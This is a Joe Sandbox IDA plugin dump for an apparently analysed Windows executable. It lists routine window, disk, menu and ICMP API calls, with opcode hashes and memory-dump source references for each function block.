                                      • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                      • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                      • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                      • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                      • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                      • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                      • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 00450A2F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 3375834691-2298589950
                                      • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                      • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                      • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                      • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID: \VH
                                      • API String ID: 1682464887-234962358
                                      • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                      • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                      • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                      • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID: \VH
                                      • API String ID: 1682464887-234962358
                                      • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                      • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                      • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                      • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID: \VH
                                      • API String ID: 1682464887-234962358
                                      • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                      • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                      • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                      • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: \VH
                                      • API String ID: 2507767853-234962358
                                      • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                      • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                      • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                      • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: \VH
                                      • API String ID: 2507767853-234962358
                                      • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                      • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                      • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                      • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                      • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                      • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                      • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                      • String ID: crts
                                      • API String ID: 943502515-3724388283
                                      • Opcode ID: 0e5f32304bbc4e17c5e8f493f416fcd7cfd0052beaa3b68be26e25aa650e50b9
                                      • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                      • Opcode Fuzzy Hash: 0e5f32304bbc4e17c5e8f493f416fcd7cfd0052beaa3b68be26e25aa650e50b9
                                      • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                      • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                      • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$LabelVolume
                                      • String ID: \VH
                                      • API String ID: 2006950084-234962358
                                      • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                      • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                      • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                      • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • GetMenuItemInfoW.USER32 ref: 00449727
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                      • DrawMenuBar.USER32 ref: 00449761
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Menu$InfoItem$Draw_malloc
                                      • String ID: 0
                                      • API String ID: 772068139-4108050209
                                      • Opcode ID: 18ac7aff4def3dceb9c3c0786e3e7c9db117af3664550b96e0931e57fc03ab70
                                      • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                      • Opcode Fuzzy Hash: 18ac7aff4def3dceb9c3c0786e3e7c9db117af3664550b96e0931e57fc03ab70
                                      • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcscpy
                                      • String ID: 3, 3, 8, 1
                                      • API String ID: 3469035223-357260408
                                      • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                      • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                      • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                      • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                      APIs
                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: ICMP.DLL$IcmpCloseHandle
                                      • API String ID: 2574300362-3530519716
                                      • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                      • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                      • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                      • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                      APIs
                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: ICMP.DLL$IcmpCreateFile
                                      • API String ID: 2574300362-275556492
                                      • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                      • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                      • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                      • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                      APIs
                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: ICMP.DLL$IcmpSendEcho
                                      • API String ID: 2574300362-58917771
                                      • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                      • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                      • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                      • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0047950F
                                      • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                      • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                      • VariantClear.OLEAUT32(?), ref: 00479650
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                      • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                      • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                      • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                      APIs
                                      • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                      • __itow.LIBCMT ref: 004699CD
                                        • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                      • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                      • __itow.LIBCMT ref: 00469A97
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow
                                      • String ID:
                                      • API String ID: 3379773720-0
                                      • Opcode ID: c3a956d33284f2c9f3f86cb058cc2767b53d45f45b0f3b019056d4494472ccb7
                                      • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                      • Opcode Fuzzy Hash: c3a956d33284f2c9f3f86cb058cc2767b53d45f45b0f3b019056d4494472ccb7
                                      • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00449A4A
                                      • ScreenToClient.USER32(?,?), ref: 00449A80
                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                      • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                      • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                      • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                      • String ID:
                                      • API String ID: 2782032738-0
                                      • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                      • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                      • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                      • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                      APIs
                                      • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                      • GetWindowRect.USER32(?,?), ref: 00441722
                                      • PtInRect.USER32(?,?,?), ref: 00441734
                                      • MessageBeep.USER32(00000000), ref: 004417AD
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
